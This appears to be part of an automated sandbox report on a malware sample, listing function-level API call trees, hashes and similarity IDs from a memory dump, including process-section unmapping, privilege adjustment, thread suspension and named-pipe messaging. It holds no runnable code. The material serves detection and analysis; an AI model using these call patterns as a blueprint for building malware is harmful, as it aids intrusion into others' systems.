    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
